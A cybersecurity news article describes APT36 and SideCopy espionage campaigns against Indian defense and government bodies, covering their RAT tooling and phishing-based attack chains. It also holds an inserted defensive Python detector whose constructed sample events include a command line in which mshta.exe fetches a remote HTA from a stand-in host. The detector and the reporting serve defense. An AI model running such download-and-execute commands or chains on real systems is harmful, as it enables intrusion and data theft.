APT36 and SideCopy Intensify Cyber Espionage with Cross-Platform RAT Campaigns Targeting Indian Entities
In a series of sophisticated cyber espionage operations, the Pakistan-aligned threat groups APT36, also known as Transparent Tribe, and its sub-cluster SideCopy have launched coordinated campaigns targeting Indian defense and government sectors. These campaigns employ advanced remote access trojans (RATs) such as Geta RAT, Ares RAT, and DeskRAT to infiltrate both Windows and Linux systems, aiming to exfiltrate sensitive information and maintain persistent access to compromised networks.
Evolving Tactics and Techniques
The recent activities of APT36 and SideCopy underscore a strategic evolution in their cyber operations. By expanding their reach across multiple platforms and adopting more sophisticated delivery methods, these groups have enhanced their ability to evade detection and sustain long-term access to targeted systems. Aditya K. Sood, Vice President of Security Engineering and AI Strategy at Aryaka, noted, "Transparent Tribe and SideCopy are not reinventing espionage – they are refining it." He emphasized their focus on cross-platform capabilities, memory-resident techniques, and innovative delivery vectors to operate stealthily while maintaining strategic objectives.
Phishing as the Primary Vector
Central to these campaigns is the use of phishing emails that contain malicious attachments or embedded links directing recipients to attacker-controlled infrastructure. These emails serve as the initial access point, deploying various payloads such as Windows shortcut (LNK) files, ELF binaries, and PowerPoint Add-In files. Once executed, these payloads initiate multi-stage processes to install the RATs, enabling the attackers to perform system reconnaissance, data collection, command execution, and establish long-term control over the infected machines.
Detailed Attack Chains
One notable attack sequence involves a malicious LNK file that triggers mshta.exe to run an HTML Application (HTA) file hosted on compromised legitimate domains. This HTA file contains JavaScript code designed to decrypt an embedded DLL payload. The DLL processes an embedded data blob to write a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the decoy document to the user. Simultaneously, the malware assesses the presence of security products on the system and adjusts its persistence mechanisms accordingly before deploying Geta RAT. This RAT is capable of executing a wide range of commands, including system information collection, process enumeration, credential harvesting, clipboard data manipulation, screenshot capture, file operations, shell command execution, and data extraction from connected USB devices.
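As an added illustration that is not part of the original report, the following detection logic flags the mshta.exe stage of the chain described above (LNK under explorer.exe launching mshta.exe with a remote HTA) over constructed Sysmon-style process-creation records; the field names and all sample values are assumptions, and because the HTA was hosted on compromised legitimate domains the rule keys on any URL rather than on domain reputation:

```python
import json
import re
from typing import Optional, Tuple

# Constructed Sysmon-style Event ID 1 (process creation) records. Field names
# follow Sysmon conventions; every value below is made up for this example.
CONSTRUCTED_EVENTS = [
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "CommandLine": r"mshta.exe https://docs.example.invalid/brief.hta",
                "ParentImage": r"C:\Windows\explorer.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "CommandLine": r"mshta.exe C:\ProgramData\vendor\helper.hta",
                "ParentImage": r"C:\Program Files\Vendor\agent.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\notepad.exe",
                "CommandLine": r"notepad.exe C:\Users\a\report.txt",
                "ParentImage": r"C:\Windows\explorer.exe"}),
    json.dumps({"Image": r"C:\Windows\SysWOW64\mshta.exe",
                "CommandLine": r'mshta.exe "C:\Users\a\Downloads\Advisory.hta"',
                "ParentImage": r"C:\Windows\explorer.exe"}),
]

URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)

def classify(event: dict) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for an mshta.exe process-creation event, else None."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return None
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    if URL_RE.search(cmd):
        # Remote HTA: the host may be a compromised legitimate domain, so the
        # signal is mshta.exe fetching any URL, not the reputation of the domain.
        return ("high", "mshta.exe executing a remote HTA")
    if parent.endswith("\\explorer.exe") and HTA_RE.search(cmd):
        # A local .hta spawned by explorer.exe matches an LNK double-click.
        return ("medium", "mshta.exe launched from explorer.exe with a local .hta")
    return ("low", "mshta.exe execution outside the patterns above")

def scan(lines):
    """Parse JSON event lines; return (severity, reason, command line) per hit."""
    findings = []
    for line in lines:
        event = json.loads(line)
        hit = classify(event)
        if hit:
            findings.append((hit[0], hit[1], event.get("CommandLine", "")))
    return findings

if __name__ == "__main__":
    for sev, reason, cmd in scan(CONSTRUCTED_EVENTS):
        print(f"[{sev}] {reason}: {cmd}")
```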
In parallel, a Linux-focused campaign utilizes a Go-based binary to deploy a Python-based Ares RAT via a shell script downloaded from an external server. Ares RAT mirrors the functionalities of Geta RAT, allowing attackers to execute various commands, harvest sensitive data, and run Python scripts or commands issued remotely.
Deployment of DeskRAT
Another observed campaign involves the delivery of DeskRAT, a Golang-based malware, through a rogue PowerPoint Add-In file. This file contains an embedded macro that establishes outbound communication with a remote server to fetch and execute the malware. The use of DeskRAT by APT36 was documented by cybersecurity firms Sekoia and QiAnXin XLab in October 2025, highlighting the group’s continuous expansion and refinement of their malware arsenal.
Broader Implications
These campaigns reflect a well-resourced and espionage-focused threat actor deliberately targeting Indian defense, government, and strategic sectors. By employing defense-themed lures, impersonating official documents, and leveraging regionally trusted infrastructure, APT36 and SideCopy have demonstrated their commitment to infiltrating critical organizations. Their activities extend beyond the defense sector to include policy, research, critical infrastructure, and defense-adjacent organizations operating within the same trusted ecosystem.
Conclusion
The deployment of advanced RATs like Geta RAT, Ares RAT, and DeskRAT underscores the evolving toolkit of APT36 and SideCopy, optimized for stealth, persistence, and long-term access. These developments highlight the need for enhanced cybersecurity measures and vigilance among Indian entities to counteract the sophisticated tactics employed by these threat actors.